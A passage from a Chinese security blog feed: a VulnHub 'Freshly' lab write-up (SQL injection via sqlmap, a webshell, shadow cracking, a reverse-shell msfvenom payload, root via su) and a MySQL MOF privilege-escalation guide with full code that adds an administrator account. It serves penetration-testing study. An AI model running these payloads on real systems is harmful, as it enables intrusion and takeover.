class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Nmap scan report for 192.168.1.104</span><br><span class="line">Host is up (0.00018s latency).</span><br><span class="line">Not shown: 97 closed ports</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">80/tcp open http</span><br><span class="line">443/tcp open https</span><br><span class="line">8080/tcp open http-proxy</span><br><span class="line">MAC Address: 08:00:27:D4:BC:A6 (Oracle VirtualBox virtual NIC)</span><br></pre></td></tr></table></figure><p>80端口有一张图片:<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/1.png" alt=""></p><p>在8080端口找到主站:<a href="http://192.168.1.104:8080/wordpress/" target="_blank" rel="noopener">http://192.168.1.104:8080/wordpress/</a><br><img src="/2019/04/19/VulnHub-Freshly-Writeup/2.png" alt=""><br>是wordpress系统</p><h3 id="wpscan扫描"><a href="#wpscan扫描" class="headerlink" title="wpscan扫描"></a>wpscan扫描</h3><p>针对wordpress进行扫描: </p><blockquote><blockquote><p>wpscan –url <a href="http://192.168.1.104:8080/wordpress/" target="_blank" rel="noopener">http://192.168.1.104:8080/wordpress/</a></p></blockquote></blockquote><p>结果:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">[+] WordPress version 4.1.26 identified (Latest, released on 2019-03-13).</span><br><span class="line">...</span><br><span class="line">[+] WordPress theme in use: twentythirteen</span><br><span class="line">...</span><br><span class="line">| Version: 1.4 (80% confidence)</span><br><span class="line"></span><br><span class="line">[i] Plugin(s) Identified:</span><br><span class="line"></span><br><span class="line">[+] all-in-one-seo-pack</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/</span><br><span class="line"> | Last Updated: 2019-02-20T19:20:00.000Z</span><br><span class="line"> | [!] The version is out of date, the latest version is 2.12</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Comment (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 5 vulnerabilities identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure</span><br><span class="line"> | Fixed in: 2.2.6</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/7881</span><br><span class="line"> | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902</span><br><span class="line"> | - http://jvn.jp/en/jp/JVN75615300/index.html</span><br><span class="line"> | - http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.2.6.2</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/7916</span><br><span class="line"> | - https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.3.7</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/8538</span><br><span class="line"> | - http://seclists.org/fulldisclosure/2016/Jul/23</span><br><span class="line"> | - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/</span><br><span class="line"> | - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html</span><br><span class="line"> | - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability</span><br><span class="line"> | - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.3.8</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/8558</span><br><span class="line"> | - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/</span><br><span class="line"> | - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.10</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/9159</span><br><span class="line"> | - https://www.ripstech.com/php-security-calendar-2018/#day-4</span><br><span class="line"> | - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/</span><br><span class="line"> | - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/</span><br><span class="line"> |</span><br><span class="line"> | Version: 2.2.5.1 (60% confidence)</span><br><span class="line"> | Detected By: Comment (Passive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/, Match: 'All in One SEO Pack 2.2.5.1 by'</span><br><span class="line"></span><br><span class="line">[+] cart66-lite</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/</span><br><span class="line"> | Last Updated: 2016-01-27T21:11:00.000Z</span><br><span class="line"> | [!] The version is out of date, the latest version is 1.5.8</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Urls In Homepage (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 2 vulnerabilities identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: Cart66 Lite <= 1.5.3 - SQL Injection</span><br><span class="line"> | Fixed in: 1.5.4</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/7737</span><br><span class="line"> | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9442</span><br><span class="line"> | - https://research.g0blin.co.uk/cve-2014-9442/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: Cart66 Lite 1.5.4 - XSS</span><br><span class="line"> | Fixed in: 1.5.5</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/8014</span><br><span class="line"> | - http://packetstormsecurity.com/files/130307/</span><br><span class="line"> |</span><br><span class="line"> | Version: 1.5.3 (100% confidence)</span><br><span class="line"> | Detected By: Readme - Stable Tag (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt</span><br><span class="line"> | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt</span><br><span class="line"></span><br><span class="line">[+] contact-form-7</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/</span><br><span class="line"> | Last Updated: 2018-12-18T18:05:00.000Z</span><br><span class="line"> | [!] The version is out of date, the latest version is 5.1.1</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Urls In Homepage (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 1 vulnerability identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation</span><br><span class="line"> | Fixed in: 5.0.4</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/9127</span><br><span class="line"> | - https://contactform7.com/2018/09/04/contact-form-7-504/</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7</span><br><span class="line"> | - https://www.ripstech.com/php-security-calendar-2018/#day-18</span><br><span class="line"> |</span><br><span class="line"> | Version: 4.1 (100% confidence)</span><br><span class="line"> | Detected By: Readme - Stable Tag (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt</span><br><span class="line"> | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt</span><br><span class="line"></span><br><span class="line">[+] proplayer</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Urls In Homepage (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 1 vulnerability identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: ProPlayer 4.7.9.1 - SQL Injection</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/6912</span><br><span class="line"> | - https://www.exploit-db.com/exploits/25605/</span><br><span class="line"> |</span><br><span class="line"> | Version: 4.7.9.1 (80% confidence)</span><br><span class="line"> | Detected By: Readme - Stable Tag (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/readme.txt</span><br></pre></td></tr></table></figure></p><p>扫描得到了wordpress版本、插件和存在的漏洞等信息,对以上存在sql注入漏洞的插件进行了测试,但都没有成功 </p><p>扫描用户名:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://192.168.1.104:8080/wordpress/ --enumerate u</span><br></pre></td></tr></table></figure></p><p>结果:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[i] User(s) Identified:</span><br><span class="line"></span><br><span class="line">[+] admin</span><br><span class="line"> | Detected By: Rss Generator (Passive Detection)</span><br><span class="line"> | Confirmed By:</span><br><span class="line"> | Rss Generator (Aggressive Detection)</span><br><span class="line"> | Author Id Brute Forcing - Author Pattern (Aggressive Detection)</span><br><span class="line"> | Login Error Messages (Aggressive Detection)</span><br></pre></td></tr></table></figure></p><p>扫描密码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://192.168.1.104:8080/wordpress --usernames admin --password-attack wp-login -P word1000.txt</span><br></pre></td></tr></table></figure></p><p>没有得到密码</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>御剑扫描<a href="http://192.168.1.104/发现phpmyadmin,login.php" target="_blank" rel="noopener">http://192.168.1.104/发现phpmyadmin,login.php</a><br><img src="/2019/04/19/VulnHub-Freshly-Writeup/3.png" alt=""><br>phpmyadmin无法登陆</p><h2 id="渗透"><a href="#渗透" class="headerlink" title="渗透"></a>渗透</h2><h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h3><p>对login.php<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/7.png" alt=""><br>输入admin’ or sleep(10)# ,页面回显明显停顿<br>存在注入,使用sqlmap:</p><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms</p></blockquote></blockquote><p>未找到注入点,调高等级:</p><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms –level=5 –risk=3</p></blockquote></blockquote><p>成功发现注入点:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">sqlmap identified the following injection point(s) with a total of 6020 HTTP(s) requests:</span><br><span class="line">---</span><br><span class="line">Parameter: user (POST)</span><br><span class="line"> Type: AND/OR time-based blind</span><br><span class="line"> Title: MySQL >= 5.0.12 AND time-based blind</span><br><span class="line"> Payload: user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit</span><br><span class="line">---</span><br><span class="line">do you want to exploit this SQL injection? [Y/n] y</span><br><span class="line">[23:21:08] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web server operating system: Linux Ubuntu</span><br><span class="line">web application technology: Apache 2.4.7, PHP 5.5.9</span><br><span class="line">back-end DBMS: MySQL >= 5.0.12</span><br></pre></td></tr></table></figure></p><p>依次使用命令: </p><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms –dbs</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms –tables -D “wordpress8080”</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms –tables -D “wordpress8080”</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms –columns -T “users” -D “wordpress8080”</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u “<a href="http://192.168.1.104/login.php"" target="_blank" rel="noopener">http://192.168.1.104/login.php"</a> –forms –dump -C “username,password” -T “users” -D “wordpress8080”</p></blockquote></blockquote><p>获得wordpress的账号密码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Table: users</span><br><span class="line">[1 entry]</span><br><span class="line">+----------+---------------------+</span><br><span class="line">| username | password |</span><br><span class="line">+----------+---------------------+</span><br><span class="line">| admin | SuperSecretPassword |</span><br><span class="line">+----------+---------------------+</span><br></pre></td></tr></table></figure></p><h3 id="wordpress后台getshell"><a href="#wordpress后台getshell" class="headerlink" title="wordpress后台getshell"></a>wordpress后台getshell</h3><p>登陆wordpress的后台后,外观-编辑模板,随便找一个php文件写入一句话木马,然后菜刀连接:<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/4.png" alt=""><br><img src="/2019/04/19/VulnHub-Freshly-Writeup/5.png" alt=""><br>菜刀上打开虚拟终端:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[/etc/]$ id</span><br><span class="line">uid=1(daemon) gid=1(daemon) groups=1(daemon)</span><br></pre></td></tr></table></figure></p><p>当前非root用户<br>查看/etc/passwd文件:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">libuuid:x:100:101::/var/lib/libuuid:</span><br><span class="line">syslog:x:101:104::/home/syslog:/bin/false</span><br><span class="line">messagebus:x:102:105::/var/run/dbus:/bin/false</span><br><span class="line">user:x:1000:1000:user,,,:/home/user:/bin/bash</span><br><span class="line">mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">candycane:x:1001:1001::/home/candycane:</span><br><span class="line"># YOU STOLE MY SECRET FILE!</span><br><span class="line"># SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"</span><br></pre></td></tr></table></figure></p><p>文件中存在提示,估计是要破解密码<br>下载/etc/passwd和/etc/shadow,在kali中: </p><blockquote><blockquote><p>unshadow passwd shadow > hashes.txt</p></blockquote></blockquote><p>将SuperSecretPassword也写入/usr/share/john/password.lst中,然后:</p><blockquote><blockquote><p>john hashes.txt</p></blockquote></blockquote><p><img src="/2019/04/19/VulnHub-Freshly-Writeup/6.png" alt=""><br>发现root用户密码就是SuperSecretPassword</p><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>msf中生成反弹meterpreter:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=5555 -f raw > frenshly.php</span><br></pre></td></tr></table></figure></p><p>菜刀上传frenshly.php至目标,然后配置msf监听,收到反弹meterpreter后,输入shell命令进入shell控制台,输入”su - root”后提示必须在终端运行,于是输入python -c ‘import pty;pty.spawn(“/bin/bash”)’进入终端完成提权.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > sysinfo</span><br><span class="line">Computer : Freshly</span><br><span class="line">OS : Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686</span><br><span class="line">Meterpreter : php/linux</span><br><span class="line">meterpreter > getuid</span><br><span class="line">Server username: daemon (1)</span><br><span class="line">meterpreter > shell</span><br><span class="line">Process 1384 created.</span><br><span class="line">Channel 0 created.</span><br><span class="line">su - root</span><br><span class="line">su: must be run from a terminal</span><br><span class="line">python -c 'import pty;pty.spawn("/bin/bash")'</span><br><span class="line">tythirteen$ ^[[C^[[C^[[C^[[C^[[C1-0/apps/wordpress/htdocs/wp-content/themes/twent</span><br><span class="line"></span><br><span class="line">tythirteen$ su - root </span><br><span class="line">su - root</span><br><span class="line">Password: SuperSecretPassword</span><br><span class="line"></span><br><span class="line">root@Freshly:~# id</span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br></pre></td></tr></table></figure></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ul><li>信息收集十分重要,必须充分掌握目标的端口、目录等</li><li>提高sqlmap的level、risk参数能是测试更加完整</li><li>掌握kali下工具的使用:wpscan、john</li></ul>]]></content>
<summary type="html">
<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h2><p>The goal of this challenge is to break into the machine via the web an
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
</entry>
<entry>
<title>mysql提权总结</title>
<link href="http://yoursite.com/2019/04/17/mysql%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/"/>
<id>http://yoursite.com/2019/04/17/mysql提权总结/</id>
<published>2019-04-17T03:18:11.000Z</published>
<updated>2019-04-17T03:25:57.217Z</updated>
<content type="html"><![CDATA[<h2 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>mof提权</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system权限执行一次,所以,只要我们将我们先要做的事通过代码存储到这个mof文件中,就可以实现权限提升。 </p><h3 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h3><p>1.mysql用户具有root权限(对上面那个目录可写)<br>2.关闭了secure-file-priv</p><h3 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h3><p>将以下代码保存为nullevt.mof文件,上传至c:/windows/system32/wbem/mof/nullevt.mof, 或者直接使用msf中的mysql_mof模块<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select load_file(“C:/php/APMServ5.2.6/www/htdocs/1.mof”) into dumpfile “c:/windows/system32/wbem/mof/nullevt.mof”</span><br></pre></td></tr></table></figure></p><h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><p>该段未添加到管理员组<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">#pragma namespace("\\\\.\\root\\subscription") </span><br><span class="line">instance of __EventFilter as $EventFilter </span><br><span class="line">{ </span><br><span class="line"> EventNamespace = "Root\\Cimv2"; </span><br><span class="line"> Name = "filtP2"; </span><br><span class="line"> Query = "Select \ From __InstanceModificationEvent "</span><br><span class="line"> "Where TargetInstance Isa \"Win32_LocalTime\"</span><br><span class="line"> "And TargetInstance.Second = 5"; </span><br><span class="line"> QueryLanguage = "WQL"; </span><br><span class="line">}; </span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer </span><br><span class="line">{ </span><br><span class="line">Name = "consPCSV2"; </span><br><span class="line">ScriptingEngine = "JScript"; </span><br><span class="line">ScriptText = </span><br><span class="line">"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; </span><br><span class="line">}; </span><br><span class="line">instance of __FilterToConsumerBinding </span><br><span class="line">{ </span><br><span class="line">Consumer = $Consumer; </span><br><span class="line">Filter = $EventFilter; </span><br><span class="line">};</span><br></pre></td></tr></table></figure></p><p>添加到管理员组:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\"net.exe localgroup Administrators hacker /add\”)“;</span><br></pre></td></tr></table></figure></p><h4 id="ascii形式"><a href="#ascii形式" class="headerlink" title="ascii形式"></a>ascii形式</h4><p>添加用户组<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32